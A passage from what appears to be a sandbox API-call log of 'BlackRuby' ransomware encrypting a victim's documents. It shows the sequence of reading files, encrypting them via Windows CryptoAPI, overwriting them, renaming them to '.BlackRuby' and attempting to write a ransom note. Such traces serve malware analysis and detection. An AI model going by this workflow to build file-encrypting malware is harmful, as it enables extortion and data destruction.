(lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.896] GetLastError () returned 0x5 [0057.897] SetErrorMode (uMode=0x0) returned 0x1 [0057.897] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", lpFilePart=0x0) returned 0x34 [0057.897] GetLastError () returned 0x5 [0057.897] SetErrorMode (uMode=0x1) returned 0x0 [0057.897] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx" (normalized: "c:\\users\\eebsym5\\documents\\qb9fgscdo8ets_0 tziw.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1c08064 | out: lpFileInformation=0x1c08064*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4f5550, ftCreationTime.dwHighDateTime=0x1d3191b, ftLastAccessTime.dwLowDateTime=0x43b9f950, ftLastAccessTime.dwHighDateTime=0x1d35f20, ftLastWriteTime.dwLowDateTime=0x43b9f950, ftLastWriteTime.dwHighDateTime=0x1d35f20, nFileSizeHigh=0x0, nFileSizeLow=0x16c01)) returned 1 [0057.897] GetLastError () returned 0x5 [0057.897] SetErrorMode (uMode=0x0) returned 0x1 [0057.898] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", lpFilePart=0x0) returned 0x34 [0057.898] GetLastError () returned 0x5 [0057.898] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", lpFilePart=0x0) returned 0x34 [0057.898] GetLastError () returned 0x5 [0057.898] SetErrorMode (uMode=0x1) returned 0x0 [0057.898] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx" (normalized: "c:\\users\\eebsym5\\documents\\qb9fgscdo8ets_0 tziw.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.898] GetLastError () returned 0x0 [0057.898] GetFileType (hFile=0x184) returned 0x1 [0057.898] SetErrorMode (uMode=0x0) returned 0x1 [0057.898] GetFileType (hFile=0x184) returned 0x1 [0057.898] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x16c01 [0057.898] GetLastError () returned 0x0 [0057.899] ReadFile (in: hFile=0x184, lpBuffer=0x2c5e8d0, nNumberOfBytesToRead=0x16c01, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c5e8d0*, lpNumberOfBytesRead=0x18ed84*=0x16c01, lpOverlapped=0x0) returned 1 [0057.900] GetLastError () returned 0x0 [0057.900] CloseHandle (hObject=0x184) returned 1 [0057.900] GetLastError () returned 0x0 [0057.901] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", lpFilePart=0x0) returned 0x34 [0057.901] GetLastError () returned 0x0 [0057.901] SetErrorMode (uMode=0x1) returned 0x0 [0057.901] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx" (normalized: "c:\\users\\eebsym5\\documents\\qb9fgscdo8ets_0 tziw.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4f5550, ftCreationTime.dwHighDateTime=0x1d3191b, ftLastAccessTime.dwLowDateTime=0x43b9f950, ftLastAccessTime.dwHighDateTime=0x1d35f20, ftLastWriteTime.dwLowDateTime=0x43b9f950, ftLastWriteTime.dwHighDateTime=0x1d35f20, nFileSizeHigh=0x0, nFileSizeLow=0x16c01)) returned 1 [0057.901] GetLastError () returned 0x0 [0057.901] SetErrorMode (uMode=0x0) returned 0x1 [0057.902] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0057.902] GetLastError () returned 0x0 [0057.937] CryptImportKey (in: hProv=0x37c790, pbData=0x1c641bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0057.937] GetLastError () returned 0x0 [0057.937] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.937] GetLastError () returned 0x0 [0057.942] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.942] GetLastError () returned 0x0 [0057.942] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x3609e0) returned 1 [0057.942] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.942] GetLastError () returned 0x0 [0057.942] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1c91208*=0x1, dwFlags=0x0) returned 1 [0057.942] GetLastError () returned 0x0 [0057.942] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1c911d4, dwFlags=0x0) returned 1 [0057.942] GetLastError () returned 0x0 [0057.943] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c8c210*, pdwDataLen=0x18ed74*=0x16d00, dwBufLen=0x16d00 | out: pbData=0x2c8c210*, pdwDataLen=0x18ed74*=0x16d00) returned 1 [0057.944] GetLastError () returned 0x0 [0057.945] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c91264*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c91264*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.945] GetLastError () returned 0x0 [0057.945] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c91294*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c91294*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.945] GetLastError () returned 0x0 [0057.947] CryptDestroyKey (hKey=0x360fa0) returned 1 [0057.947] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.948] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.948] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", lpFilePart=0x0) returned 0x34 [0057.948] GetLastError () returned 0x0 [0057.948] SetErrorMode (uMode=0x1) returned 0x0 [0057.948] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx" (normalized: "c:\\users\\eebsym5\\documents\\qb9fgscdo8ets_0 tziw.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.949] GetLastError () returned 0xb7 [0057.949] GetFileType (hFile=0x184) returned 0x1 [0057.949] SetErrorMode (uMode=0x0) returned 0x1 [0057.949] GetFileType (hFile=0x184) returned 0x1 [0057.951] CloseHandle (hObject=0x184) returned 1 [0057.951] GetLastError () returned 0xb7 [0057.951] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx", lpFilePart=0x0) returned 0x34 [0057.951] GetLastError () returned 0xb7 [0057.951] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_uOvHNrXm3wEiTrz3XEvlJgdTLEBolEdvD9Ph85Of.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_uOvHNrXm3wEiTrz3XEvlJgdTLEBolEdvD9Ph85Of.BlackRuby", lpFilePart=0x0) returned 0x57 [0057.951] GetLastError () returned 0xb7 [0057.951] SetErrorMode (uMode=0x1) returned 0x0 [0057.951] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx" (normalized: "c:\\users\\eebsym5\\documents\\qb9fgscdo8ets_0 tziw.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4f5550, ftCreationTime.dwHighDateTime=0x1d3191b, ftLastAccessTime.dwLowDateTime=0x43b9f950, ftLastAccessTime.dwHighDateTime=0x1d35f20, ftLastWriteTime.dwLowDateTime=0x2abbe420, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x16d10)) returned 1 [0057.951] GetLastError () returned 0xb7 [0057.951] SetErrorMode (uMode=0x0) returned 0x1 [0057.951] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\qb9fgscDo8ets_0 tZiw.pptx" (normalized: "c:\\users\\eebsym5\\documents\\qb9fgscdo8ets_0 tziw.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_uOvHNrXm3wEiTrz3XEvlJgdTLEBolEdvD9Ph85Of.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_uovhnrxm3weitrz3xevljgdtleboledvd9ph85of.blackruby")) returned 1 [0057.952] GetLastError () returned 0xb7 [0057.952] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.952] GetLastError () returned 0xb7 [0057.952] SetErrorMode (uMode=0x1) returned 0x0 [0057.952] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.952] GetLastError () returned 0x5 [0057.953] SetErrorMode (uMode=0x0) returned 0x1 [0057.953] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", lpFilePart=0x0) returned 0x29 [0057.953] GetLastError () returned 0x5 [0057.953] SetErrorMode (uMode=0x1) returned 0x0 [0057.953] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx" (normalized: "c:\\users\\eebsym5\\documents\\syavnxk5m.docx"), fInfoLevelId=0x0, lpFileInformation=0x1cae3e4 | out: lpFileInformation=0x1cae3e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbdac890, ftCreationTime.dwHighDateTime=0x1d38fd7, ftLastAccessTime.dwLowDateTime=0x59dd2160, ftLastAccessTime.dwHighDateTime=0x1d365d5, ftLastWriteTime.dwLowDateTime=0x59dd2160, ftLastWriteTime.dwHighDateTime=0x1d365d5, nFileSizeHigh=0x0, nFileSizeLow=0x7b35)) returned 1 [0057.953] GetLastError () returned 0x5 [0057.953] SetErrorMode (uMode=0x0) returned 0x1 [0057.954] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", lpFilePart=0x0) returned 0x29 [0057.954] GetLastError () returned 0x5 [0057.954] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", lpFilePart=0x0) returned 0x29 [0057.954] GetLastError () returned 0x5 [0057.954] SetErrorMode (uMode=0x1) returned 0x0 [0057.954] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx" (normalized: "c:\\users\\eebsym5\\documents\\syavnxk5m.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.954] GetLastError () returned 0x0 [0057.954] GetFileType (hFile=0x184) returned 0x1 [0057.954] SetErrorMode (uMode=0x0) returned 0x1 [0057.954] GetFileType (hFile=0x184) returned 0x1 [0057.954] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x7b35 [0057.954] GetLastError () returned 0x0 [0057.954] ReadFile (in: hFile=0x184, lpBuffer=0x1cb0038, nNumberOfBytesToRead=0x7b35, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cb0038*, lpNumberOfBytesRead=0x18ed84*=0x7b35, lpOverlapped=0x0) returned 1 [0057.955] GetLastError () returned 0x0 [0057.955] CloseHandle (hObject=0x184) returned 1 [0057.955] GetLastError () returned 0x0 [0057.955] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", lpFilePart=0x0) returned 0x29 [0057.955] GetLastError () returned 0x0 [0057.955] SetErrorMode (uMode=0x1) returned 0x0 [0057.955] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx" (normalized: "c:\\users\\eebsym5\\documents\\syavnxk5m.docx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbdac890, ftCreationTime.dwHighDateTime=0x1d38fd7, ftLastAccessTime.dwLowDateTime=0x59dd2160, ftLastAccessTime.dwHighDateTime=0x1d365d5, ftLastWriteTime.dwLowDateTime=0x59dd2160, ftLastWriteTime.dwHighDateTime=0x1d365d5, nFileSizeHigh=0x0, nFileSizeLow=0x7b35)) returned 1 [0057.955] GetLastError () returned 0x0 [0057.955] SetErrorMode (uMode=0x0) returned 0x1 [0057.966] CryptImportKey (in: hProv=0x37c818, pbData=0x1d19a4c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360a20) returned 1 [0057.966] GetLastError () returned 0x0 [0057.966] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.966] GetLastError () returned 0x0 [0057.971] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.971] GetLastError () returned 0x0 [0057.971] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e20) returned 1 [0057.971] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.971] GetLastError () returned 0x0 [0057.971] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1d46a98*=0x1, dwFlags=0x0) returned 1 [0057.972] GetLastError () returned 0x0 [0057.972] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1d46a64, dwFlags=0x0) returned 1 [0057.972] GetLastError () returned 0x0 [0057.972] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d46ae0*, pdwDataLen=0x18ed74*=0x7c30, dwBufLen=0x7c30 | out: pbData=0x1d46ae0*, pdwDataLen=0x18ed74*=0x7c30) returned 1 [0057.972] GetLastError () returned 0x0 [0057.972] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d5636c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d5636c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.972] GetLastError () returned 0x0 [0057.972] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d5639c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d5639c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.972] GetLastError () returned 0x0 [0057.976] CryptDestroyKey (hKey=0x360a20) returned 1 [0057.976] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.976] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.976] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", lpFilePart=0x0) returned 0x29 [0057.976] GetLastError () returned 0x0 [0057.976] SetErrorMode (uMode=0x1) returned 0x0 [0057.976] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx" (normalized: "c:\\users\\eebsym5\\documents\\syavnxk5m.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.977] GetLastError () returned 0xb7 [0057.978] GetFileType (hFile=0x184) returned 0x1 [0057.978] SetErrorMode (uMode=0x0) returned 0x1 [0057.978] GetFileType (hFile=0x184) returned 0x1 [0057.978] WriteFile (in: hFile=0x184, lpBuffer=0x1b65954*, nNumberOfBytesToWrite=0x7c40, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1b65954*, lpNumberOfBytesWritten=0x18ed90*=0x7c40, lpOverlapped=0x0) returned 1 [0057.979] GetLastError () returned 0xb7 [0057.979] CloseHandle (hObject=0x184) returned 1 [0057.980] GetLastError () returned 0xb7 [0057.980] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx", lpFilePart=0x0) returned 0x29 [0057.980] GetLastError () returned 0xb7 [0057.980] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_PYk3ZTcT1p0LO4iN4UjraShzwmhWoDkQMCPnSwVy.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_PYk3ZTcT1p0LO4iN4UjraShzwmhWoDkQMCPnSwVy.BlackRuby", lpFilePart=0x0) returned 0x57 [0057.980] GetLastError () returned 0xb7 [0057.980] SetErrorMode (uMode=0x1) returned 0x0 [0057.980] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx" (normalized: "c:\\users\\eebsym5\\documents\\syavnxk5m.docx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbdac890, ftCreationTime.dwHighDateTime=0x1d38fd7, ftLastAccessTime.dwLowDateTime=0x59dd2160, ftLastAccessTime.dwHighDateTime=0x1d365d5, ftLastWriteTime.dwLowDateTime=0x2ac0a6e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x7c40)) returned 1 [0057.980] GetLastError () returned 0xb7 [0057.980] SetErrorMode (uMode=0x0) returned 0x1 [0057.980] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\SyAvNXk5M.docx" (normalized: "c:\\users\\eebsym5\\documents\\syavnxk5m.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_PYk3ZTcT1p0LO4iN4UjraShzwmhWoDkQMCPnSwVy.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_pyk3ztct1p0lo4in4ujrashzwmhwodkqmcpnswvy.blackruby")) returned 1 [0057.980] GetLastError () returned 0xb7 [0057.981] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.981] GetLastError () returned 0xb7 [0057.981] SetErrorMode (uMode=0x1) returned 0x0 [0057.981] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.981] GetLastError () returned 0x5 [0057.983] SetErrorMode (uMode=0x0) returned 0x1 [0057.983] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", lpFilePart=0x0) returned 0x32 [0057.983] GetLastError () returned 0x5 [0057.983] SetErrorMode (uMode=0x1) returned 0x0 [0057.983] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx" (normalized: "c:\\users\\eebsym5\\documents\\t8zg2rs5xdoe5xvtlx.docx"), fInfoLevelId=0x0, lpFileInformation=0x1b8a664 | out: lpFileInformation=0x1b8a664*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5323fa10, ftCreationTime.dwHighDateTime=0x1d3952d, ftLastAccessTime.dwLowDateTime=0x43f444d0, ftLastAccessTime.dwHighDateTime=0x1d37248, ftLastWriteTime.dwLowDateTime=0x43f444d0, ftLastWriteTime.dwHighDateTime=0x1d37248, nFileSizeHigh=0x0, nFileSizeLow=0x18013)) returned 1 [0057.983] GetLastError () returned 0x5 [0057.983] SetErrorMode (uMode=0x0) returned 0x1 [0057.984] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", lpFilePart=0x0) returned 0x32 [0057.984] GetLastError () returned 0x5 [0057.984] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", lpFilePart=0x0) returned 0x32 [0057.984] GetLastError () returned 0x5 [0057.984] SetErrorMode (uMode=0x1) returned 0x0 [0057.984] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx" (normalized: "c:\\users\\eebsym5\\documents\\t8zg2rs5xdoe5xvtlx.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.984] GetLastError () returned 0x0 [0057.984] GetFileType (hFile=0x184) returned 0x1 [0057.984] SetErrorMode (uMode=0x0) returned 0x1 [0057.984] GetFileType (hFile=0x184) returned 0x1 [0057.984] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x18013 [0057.984] GetLastError () returned 0x0 [0057.985] ReadFile (in: hFile=0x184, lpBuffer=0x2cfe3a0, nNumberOfBytesToRead=0x18013, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2cfe3a0*, lpNumberOfBytesRead=0x18ed84*=0x18013, lpOverlapped=0x0) returned 1 [0057.986] GetLastError () returned 0x0 [0057.986] CloseHandle (hObject=0x184) returned 1 [0057.987] GetLastError () returned 0x0 [0057.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", lpFilePart=0x0) returned 0x32 [0057.988] GetLastError () returned 0x0 [0057.988] SetErrorMode (uMode=0x1) returned 0x0 [0057.988] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx" (normalized: "c:\\users\\eebsym5\\documents\\t8zg2rs5xdoe5xvtlx.docx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5323fa10, ftCreationTime.dwHighDateTime=0x1d3952d, ftLastAccessTime.dwLowDateTime=0x43f444d0, ftLastAccessTime.dwHighDateTime=0x1d37248, ftLastWriteTime.dwLowDateTime=0x43f444d0, ftLastWriteTime.dwHighDateTime=0x1d37248, nFileSizeHigh=0x0, nFileSizeLow=0x18013)) returned 1 [0057.988] GetLastError () returned 0x0 [0057.988] SetErrorMode (uMode=0x0) returned 0x1 [0057.988] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0057.988] GetLastError () returned 0x0 [0058.027] CryptImportKey (in: hProv=0x37c680, pbData=0x1be662c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360b20) returned 1 [0058.027] GetLastError () returned 0x0 [0058.027] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.027] GetLastError () returned 0x0 [0058.032] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.032] GetLastError () returned 0x0 [0058.032] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f60) returned 1 [0058.033] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.033] GetLastError () returned 0x0 [0058.033] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1c13678*=0x1, dwFlags=0x0) returned 1 [0058.033] GetLastError () returned 0x0 [0058.033] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1c13644, dwFlags=0x0) returned 1 [0058.033] GetLastError () returned 0x0 [0058.034] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d2e500*, pdwDataLen=0x18ed74*=0x18110, dwBufLen=0x18110 | out: pbData=0x2d2e500*, pdwDataLen=0x18ed74*=0x18110) returned 1 [0058.035] 